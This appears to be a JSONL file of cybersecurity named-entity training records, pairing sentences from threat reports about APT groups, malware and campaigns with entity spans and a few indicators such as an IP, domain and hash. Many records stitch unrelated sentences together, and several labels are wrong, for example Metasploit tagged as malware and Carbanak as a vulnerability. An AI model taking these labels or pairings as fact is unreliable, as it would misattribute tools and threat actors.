The attackers are known for their targeting of highvalue victims , often focusing on organizations in the government , technology , and defense sectors .", "spans": {"MALWARE: RuMMS": [[89, 94]], "THREAT_ACTOR: PROMETHIUM": [[124, 134]], "THREAT_ACTOR: NEODYMIUM": [[139, 148]], "FILEPATH: .dot": [[224, 228]], "TOOL: Microsoft Office": [[251, 266]], "THREAT_ACTOR: attackers": [[336, 345]], "ORGANIZATION: highvalue victims": [[379, 396]], "ORGANIZATION: organizations": [[417, 430]], "ORGANIZATION: government": [[438, 448]], "ORGANIZATION: technology": [[451, 461]], "ORGANIZATION: defense sectors": [[468, 483]]}, "info": {"id": "cyberner_stix_train_000144", "source": "cyberner_stix_train"}} {"text": "Issue remote mouse clicks and keyboard strokes .", "spans": {}, "info": {"id": "cyberner_stix_train_000145", "source": "cyberner_stix_train"}} {"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91.230.121.143 remote-server.ddns.net . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"ORGANIZATION: Lookout": [[129, 136]], "ORGANIZATION: Microsoft": [[176, 185]], "ORGANIZATION: Facebook": [[210, 218]], "ORGANIZATION: security community": [[237, 255]], "THREAT_ACTOR: threat actor": [[365, 377]], "THREAT_ACTOR: ZINC": [[393, 397]], "THREAT_ACTOR: Lazarus Group": [[418, 431]], "THREAT_ACTOR: APT33": [[434, 439]], "IP_ADDRESS: 91.230.121.143": [[442, 456]], "DOMAIN: remote-server.ddns.net": [[457, 479]]}, "info": {"id": "cyberner_stix_train_000146", "source": "cyberner_stix_train"}} {"text": "In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"MALWARE: Gelup": [[150, 155]], "THREAT_ACTOR: CopyKittens": [[189, 200]], "MALWARE: Metasploit": [[205, 215]], "VULNERABILITY: exploit": [[291, 298]], "MALWARE: Mimikatz": [[338, 346]], "MALWARE: Empire": [[413, 419]], "MALWARE: PowerShell": [[424, 434]], "TOOL: Python": [[439, 445]]}, "info": {"id": "cyberner_stix_train_000147", "source": "cyberner_stix_train"}} {"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . 
The group is known for espionage campaigns in the Middle East .", "spans": {"THREAT_ACTOR: criminal groups": [[270, 285]], "THREAT_ACTOR: PoSeidon": [[346, 354]], "VULNERABILITY: Carbanak": [[390, 398]], "THREAT_ACTOR: criminal organization": [[416, 437]], "THREAT_ACTOR: Carbon Spider": [[450, 463]]}, "info": {"id": "cyberner_stix_train_000148", "source": "cyberner_stix_train"}} {"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed . The Seedworm group is the only group known to use the Powermud backdoor . The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"THREAT_ACTOR: Seedworm group": [[91, 105]], "THREAT_ACTOR: group": [[118, 123]], "TOOL: Powermud backdoor": [[141, 158]], "ORGANIZATION: Kaspersky": [[280, 289]], "ORGANIZATION: think tanks": [[334, 345]], "ORGANIZATION: individuals working in various areas related to security and geopolitics": [[350, 422]]}, "info": {"id": "cyberner_stix_train_000149", "source": "cyberner_stix_train"}} {"text": "It sends “ home ” key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . 
Upload a specific file based on a filename .", "spans": {"ORGANIZATION: Facebook": [[228, 236]], "SYSTEM: Messenger": [[244, 253]], "ORGANIZATION: Kaspersky": [[270, 279]], "THREAT_ACTOR: Oilrig": [[343, 349]], "THREAT_ACTOR: Stonedrill": [[354, 364]]}, "info": {"id": "cyberner_stix_train_000150", "source": "cyberner_stix_train"}} {"text": "Table 1 not only shows the commands used for discovery , but also the commands used to deploy another webshell to the server using the echo command to write base64 encoded data to a.txt and using the certutil application to decode and save to bitreeview.aspx .", "spans": {"FILEPATH: a.txt": [[180, 185]], "FILEPATH: bitreeview.aspx": [[243, 258]]}, "info": {"id": "cyberner_stix_train_000151", "source": "cyberner_stix_train"}} {"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . 
In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications and travel industries": [[22, 62]], "ORGANIZATION: specific individuals": [[149, 169]], "ORGANIZATION: Palo Alto Networks WildFire": [[404, 431]], "TOOL: e-mails": [[445, 452]], "ORGANIZATION: industrial organization": [[556, 579]]}, "info": {"id": "cyberner_stix_train_000152", "source": "cyberner_stix_train"}} {"text": "Many of these individuals held communications , media , finance , or policy roles .", "spans": {}, "info": {"id": "cyberner_stix_train_000153", "source": "cyberner_stix_train"}} {"text": "FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics ( CNIIHM ; a.k.a. ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: TRITON": [[101, 107]], "ORGANIZATION: Central Scientific Research Institute of Chemistry and Mechanics": [[129, 193]], "ORGANIZATION: CNIIHM": [[196, 202]], "ORGANIZATION: ЦНИИХМ": [[212, 218]]}, "info": {"id": "cyberner_stix_train_000154", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "SYSTEM: Windows": [[255, 262]]}, "info": {"id": "cyberner_stix_train_000155", "source": "cyberner_stix_train"}} {"text": "Interestingly , there is a domain which used to point there , “ DlmDocumentsExchange.com ” . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"VULNERABILITY: CVE-2013-5065": [[136, 149]], "VULNERABILITY: EoP exploit": [[150, 161]], "ORGANIZATION: Microsoft": [[199, 208]], "THREAT_ACTOR: Neodymium": [[231, 240]], "THREAT_ACTOR: activity groups": [[280, 295]], "ORGANIZATION: economic": [[354, 362]], "THREAT_ACTOR: PROMETHIUM": [[375, 385]], "THREAT_ACTOR: NEODYMIUM": [[390, 399]]}, "info": {"id": "cyberner_stix_train_000156", "source": "cyberner_stix_train"}} {"text": "Previously , it had used exploits to deliver and execute the first stage malware , while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain .", "spans": {}, "info": {"id": "cyberner_stix_train_000157", "source": "cyberner_stix_train"}} {"text": "In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . 
The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"THREAT_ACTOR: threat actor": [[87, 99]], "TOOL: hTran": [[131, 136]], "MALWARE: GozNym": [[159, 165]], "MALWARE: Trojan": [[211, 217]], "ORGANIZATION: banking customers": [[291, 308]]}, "info": {"id": "cyberner_stix_train_000158", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Adobe Flash Player exploit .", "spans": {"MALWARE: them": [[22, 26]], "TOOL: Adobe Flash Player": [[163, 181]], "VULNERABILITY: exploit": [[182, 189]]}, "info": {"id": "cyberner_stix_train_000159", "source": "cyberner_stix_train"}} {"text": "Then the Trojan will put the patched library back into the system directory . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product . RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": {"TOOL: VAMP": [[119, 123]], "THREAT_ACTOR: APT-C-23": [[167, 175]], "THREAT_ACTOR: RevengeHotels": [[236, 249]], "FILEPATH: 74440d5d0e6ae9b9a03d06dd61718f66": [[252, 284]]}, "info": {"id": "cyberner_stix_train_000160", "source": "cyberner_stix_train"}} {"text": "Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . 
Once the user enters an account and password , it will initiate POST using AJAX .", "spans": {"THREAT_ACTOR: actor": [[29, 34]], "ORGANIZATION: defense contractors": [[129, 148]]}, "info": {"id": "cyberner_stix_train_000161", "source": "cyberner_stix_train"}} {"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"MALWARE: DroidJack RAT": [[0, 13]], "THREAT_ACTOR: admin@338": [[109, 118]], "ORGANIZATION: financial and policy organizations": [[147, 181]], "ORGANIZATION: audiences": [[270, 279]]}, "info": {"id": "cyberner_stix_train_000162", "source": "cyberner_stix_train"}} {"text": "No Chrysaor apps were on Google Play . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector . The code added to the executable decrypts and launches the backdoor in-memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application . 
The eventual execution of the attack coincided with the start of a multi - day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities , including the city in which the victim was located .", "spans": {"MALWARE: Chrysaor": [[3, 11]], "SYSTEM: Google Play": [[25, 36]], "THREAT_ACTOR: RASPITE": [[39, 46]], "ORGANIZATION: electric utility sector": [[125, 148]]}, "info": {"id": "cyberner_stix_train_000163", "source": "cyberner_stix_train"}} {"text": "These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments .", "spans": {"TOOL: IoT": [[93, 96]]}, "info": {"id": "cyberner_stix_train_000164", "source": "cyberner_stix_train"}} {"text": "As we noted in M-Trends 2016 , Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment , so 99 days is still 96 days too long . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"ORGANIZATION: M-Trends": [[15, 23]], "ORGANIZATION: Mandiant’s": [[31, 41]], "ORGANIZATION: social engineering": [[226, 244]], "THREAT_ACTOR: actor": [[274, 279]], "ORGANIZATION: diaspora": [[358, 366]], "ORGANIZATION: government employees": [[391, 411]]}, "info": {"id": "cyberner_stix_train_000165", "source": "cyberner_stix_train"}} {"text": "Based on the metadata of the Office documents and the PE files , the attackers had created the file on Wednesday , the 4th of October .", "spans": {"TOOL: Office": [[29, 35]], "TOOL: PE": [[54, 56]]}, "info": {"id": "cyberner_stix_train_000166", "source": "cyberner_stix_train"}} {"text": "The actor delivered two more files into the victim ’s system folder : rasext.dll and msctfp.dat .", "spans": {"FILEPATH: rasext.dll": [[70, 80]], 
"FILEPATH: msctfp.dat": [[85, 95]]}, "info": {"id": "cyberner_stix_train_000167", "source": "cyberner_stix_train"}} {"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": {"THREAT_ACTOR: PassCV": [[218, 224]], "MALWARE: RATs": [[307, 311]], "MALWARE: ZxShell": [[317, 324]], "MALWARE: Ghost RAT": [[329, 338]]}, "info": {"id": "cyberner_stix_train_000168", "source": "cyberner_stix_train"}} {"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT . The group 's main objective is to steal source codes . If so , it spawns the service watchdog thread . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": {"ORGANIZATION: Hamas": [[0, 5]], "MALWARE: ViperRAT": [[131, 139]], "TOOL: watchdog": [[227, 235]], "ORGANIZATION: Wall to Wall": [[245, 257]], "ORGANIZATION: Bullock": [[308, 315]], "ORGANIZATION: KrebsOnSecurity": [[322, 337]]}, "info": {"id": "cyberner_stix_train_000169", "source": "cyberner_stix_train"}} {"text": "Third place is shared by Italy , Ukraine , and the United Kingdom . Waterbug also used an older version of PowerShell , likely to avoid logging . 
Throughout the multiple campaigns observed over the last 3 years , the actor has used an email attachment as the initial infection vector .", "spans": {"THREAT_ACTOR: Waterbug": [[68, 76]], "TOOL: PowerShell": [[107, 117]]}, "info": {"id": "cyberner_stix_train_000170", "source": "cyberner_stix_train"}} {"text": "These activities depend on the device configuration . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Reverse Shell : The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"MALWARE: Microsoft Word document": [[114, 137]], "TOOL: Reverse Shell": [[257, 270]], "MALWARE: PIEHOP": [[287, 293]]}, "info": {"id": "cyberner_stix_train_000171", "source": "cyberner_stix_train"}} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]]}, "info": {"id": "cyberner_stix_train_000172", "source": "cyberner_stix_train"}} {"text": "BusyGasper – the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family . 
This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"MALWARE: BusyGasper": [[0, 10]], "SYSTEM: Android": [[129, 136]], "THREAT_ACTOR: Lazarus": [[254, 261]], "ORGANIZATION: financial organizations": [[339, 362]], "MALWARE: Mimikatz": [[365, 373]], "MALWARE: Hacktool.Mimikatz": [[376, 393]], "MALWARE: COSMICENERGY": [[525, 537]], "ORGANIZATION: Rostelecom - Solar": [[601, 619]]}, "info": {"id": "cyberner_stix_train_000173", "source": "cyberner_stix_train"}} {"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: backdoors": [[26, 35]], "THREAT_ACTOR: Cobalt Strike": [[74, 87]], "TOOL: BEACON": [[88, 94]], "TOOL: backdoor": [[95, 103]], "THREAT_ACTOR: groups": [[112, 118]], "THREAT_ACTOR: Buhtrap": [[129, 136]], "MALWARE: Corkow": [[139, 145]], "THREAT_ACTOR: Carbanak": [[150, 158]], "ORGANIZATION: financial institutions": [[224, 246]], "ORGANIZATION: customers": [[257, 266]]}, "info": {"id": "cyberner_stix_train_000174", "source": "cyberner_stix_train"}} {"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior . 
Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work . ( A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"THREAT_ACTOR: Gorgon Group": [[154, 166]], "VULNERABILITY: SSRF vulnerability": [[366, 384]], "VULNERABILITY: CVE-2022 - 41040": [[388, 404]]}, "info": {"id": "cyberner_stix_train_000175", "source": "cyberner_stix_train"}} {"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA . The macro in this document gets executed when the user views the document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document ’s properties . All downloaders attempt to download an image file from a URL .", "spans": {"TOOL: macro": [[229, 234], [346, 351]]}, "info": {"id": "cyberner_stix_train_000176", "source": "cyberner_stix_train"}} {"text": "The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . 
Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and PROT without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": {"MALWARE: DEFENSOR ID": [[4, 15]], "SYSTEM: Google Play store": [[53, 70]], "THREAT_ACTOR: SLUB": [[125, 129]], "VULNERABILITY: CVE-2018-8174": [[184, 197]], "MALWARE: PapaAlfa": [[243, 251], [462, 470]], "THREAT_ACTOR: Lazarus": [[319, 326]], "MALWARE: malware": [[471, 478]]}, "info": {"id": "cyberner_stix_train_000177", "source": "cyberner_stix_train"}} {"text": "Threat Group 3390 Cyberespionage .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[0, 17]]}, "info": {"id": "cyberner_stix_train_000178", "source": "cyberner_stix_train"}} {"text": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic , poisoning the NetBIOS Name Service , and spreading laterally via the EternalBlue exploit .", "spans": {"TOOL: sniffing passwords": [[73, 91]], "TOOL: Wi-Fi traffic": [[97, 110]], "TOOL: NetBIOS Name Service": [[127, 147]], "VULNERABILITY: EternalBlue": [[182, 193]]}, "info": {"id": "cyberner_stix_train_000179", "source": "cyberner_stix_train"}} {"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Investigators put the origin of the attack as Iranian ; Morphisec ’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns . 
This sample works in tandem with PIEHOP , which sets up the execution .", "spans": {"SYSTEM: Super Mario Run": [[59, 74]], "SYSTEM: Android": [[106, 113]], "THREAT_ACTOR: admin@338": [[143, 152]], "ORGANIZATION: media organizations": [[211, 230]], "ORGANIZATION: Morphisec": [[337, 346]], "MALWARE: OilRig": [[465, 471]]}, "info": {"id": "cyberner_stix_train_000180", "source": "cyberner_stix_train"}} {"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis . Because of this , the allocated heaps will not be freed . Anonymous Sudan appeared to be a core driver of claimed attacks targeting countries further afield , and it is primarily responsible for the recent surge of Israeli targeting ; however , nearly half of claimed Anonymous Sudan attacks still focused on U.S. or European organizations .", "spans": {"TOOL: NoFuserEx": [[169, 178]], "TOOL: ConfuserEx Fixer": [[181, 197]], "TOOL: ConfuserEx Switch Killer": [[200, 224]], "TOOL: de4d0t": [[231, 237]], "THREAT_ACTOR: Anonymous Sudan": [[353, 368]], "THREAT_ACTOR: Anonymous Sudan attacks": [[563, 586]], "ORGANIZATION: U.S. or European organizations": [[604, 634]]}, "info": {"id": "cyberner_stix_train_000181", "source": "cyberner_stix_train"}} {"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system . This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code . 
But a layered , comprehensive cyber security strategy can do even more to keep your organization safe and secure .", "spans": {"TOOL: web shells": [[168, 178]]}, "info": {"id": "cyberner_stix_train_000182", "source": "cyberner_stix_train"}} {"text": "After alternating for over four months with Dridex , Locky became the payload of choice for TA505 , eclipsing earlier campaigns in terms of volume and reach .", "spans": {"MALWARE: Dridex": [[44, 50]], "MALWARE: Locky": [[53, 58]], "THREAT_ACTOR: TA505": [[92, 97]]}, "info": {"id": "cyberner_stix_train_000183", "source": "cyberner_stix_train"}} {"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: WhiteBear": [[183, 192]], "ORGANIZATION: embassies": [[217, 226]]}, "info": {"id": "cyberner_stix_train_000184", "source": "cyberner_stix_train"}} {"text": "We have seen different HawkEye campaigns infecting organizations across many sectors globally , and stealing user credentials for diverse online services . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"THREAT_ACTOR: HawkEye": [[23, 30]], "ORGANIZATION: citizens—journalists": [[164, 184]], "ORGANIZATION: software developers": [[187, 206]], "ORGANIZATION: politicians": [[209, 220]], "ORGANIZATION: researchers at universities": [[223, 250]], "ORGANIZATION: artists": [[257, 264]], "THREAT_ACTOR: Pawn Storm": [[286, 296]]}, "info": {"id": "cyberner_stix_train_000185", "source": "cyberner_stix_train"}} {"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware . 
Given the available data , we assess that APT28 's work is sponsored by the Russian government . Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is . Suspicious Login Patterns on NetScaler", "spans": {"THREAT_ACTOR: APT28": [[165, 170]], "MALWARE: AdrGen": [[257, 263]]}, "info": {"id": "cyberner_stix_train_000186", "source": "cyberner_stix_train"}} {"text": "A recent whois of “ goldncup.com ” . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines . The large grouping on the right of the diagram are direct variants of the sample referenced in this write up . One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"ORGANIZATION: social engineering": [[47, 65]], "THREAT_ACTOR: actor": [[95, 100]], "ORGANIZATION: diaspora": [[179, 187]], "ORGANIZATION: government employees": [[212, 232]], "ORGANIZATION: Hack520": [[394, 401]]}, "info": {"id": "cyberner_stix_train_000187", "source": "cyberner_stix_train"}} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": {"MALWARE: Silence.Main Trojan": [[4, 23]], "MALWARE: Corkow": [[174, 180]], "THREAT_ACTOR: Metel": [[183, 188]], "MALWARE: Trojan": [[191, 197]]}, "info": {"id": "cyberner_stix_train_000188", "source": "cyberner_stix_train"}} {"text": "Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number . Gallmaker 's targets are embassies of an Eastern European country . then calls optblock_t : :f unc callback . 
The regex , and thus the rule , will match only the requests made to the endpoint of the Microsoft Exchange server .", "spans": {"SYSTEM: Tor": [[0, 3]], "SYSTEM: Android": [[17, 24]], "THREAT_ACTOR: Gallmaker": [[184, 193]], "ORGANIZATION: embassies": [[209, 218]], "TOOL: calls optblock_t : :f unc": [[257, 282]]}, "info": {"id": "cyberner_stix_train_000189", "source": "cyberner_stix_train"}} {"text": "STEALING SENSITIVE INFORMATION FakeSpy has multiple built in information stealing capabilities . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"MALWARE: FakeSpy": [[31, 38]], "THREAT_ACTOR: actor": [[117, 122]], "TOOL: HyperBro": [[158, 166]], "THREAT_ACTOR: Emissary Panda": [[200, 214]], "THREAT_ACTOR: Honeybee": [[240, 248]]}, "info": {"id": "cyberner_stix_train_000190", "source": "cyberner_stix_train"}} {"text": "Attackers are keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning . These backdoors give APT intruders a laundry list of ways to control victim systems . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": {"SYSTEM: Android": [[155, 162]], "TOOL: Nymaim": [[236, 242]], "TOOL: Gozi malware": [[247, 259]], "THREAT_ACTOR: attackers": [[446, 455]]}, "info": {"id": "cyberner_stix_train_000191", "source": "cyberner_stix_train"}} {"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. 
, if a new package is installed or if the device ’ s screen is on ) to steal personal data , such as those keyed in for banking apps . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . An interesting part of the script is the continuous killing of every “ rundll32.exe ” process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": {"ORGANIZATION: (DNC)": [[353, 358]], "FILEPATH: rundll32.exe": [[432, 444]]}, "info": {"id": "cyberner_stix_train_000192", "source": "cyberner_stix_train"}} {"text": "Restrict administrative privileges .", "spans": {}, "info": {"id": "cyberner_stix_train_000193", "source": "cyberner_stix_train"}} {"text": "It ’ s also worth noting that both campaigns repackage apps that are commonly used in their target ’ s countries , such as Telegram , Kik , and Plus messaging apps . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 . As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": {"SYSTEM: Telegram": [[123, 131]], "SYSTEM: Kik": [[134, 137]], "SYSTEM: Plus": [[144, 148]], "SYSTEM: Operating systems": [[437, 454]], "SYSTEM: system files": [[519, 531]]}, "info": {"id": "cyberner_stix_train_000194", "source": "cyberner_stix_train"}} {"text": "The specific apps can be found in the target list in the appendix . 
We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . Though Daserf wasn’t a popular attack tool at the time of publishing the two reports , it dates back to at least 2011 .", "spans": {"THREAT_ACTOR: APT10": [[83, 88]], "MALWARE: Daserf": [[255, 261]]}, "info": {"id": "cyberner_stix_train_000195", "source": "cyberner_stix_train"}} {"text": "Based on the use of the relatively unique PLAINTEE malware , the malware 's use of the same file paths on in each cluster , and the similar targeting , we have grouped these attacks together under the RANCOR campaign moniker . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"TOOL: PLAINTEE malware": [[42, 58]], "TOOL: emails": [[234, 240]], "ORGANIZATION: government officials": [[255, 275]], "FILEPATH: malicious Microsoft Word document": [[317, 350]], "VULNERABILITY: CVE-2012-0158": [[370, 383]]}, "info": {"id": "cyberner_stix_train_000196", "source": "cyberner_stix_train"}} {"text": "We find multiple file/object names hinting at the version , but must compelling :", "spans": {}, "info": {"id": "cyberner_stix_train_000197", "source": "cyberner_stix_train"}} {"text": "Initialization of the compiler object The plugins can be added in runtime , or they can be added as a package resource at packaging time . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . 
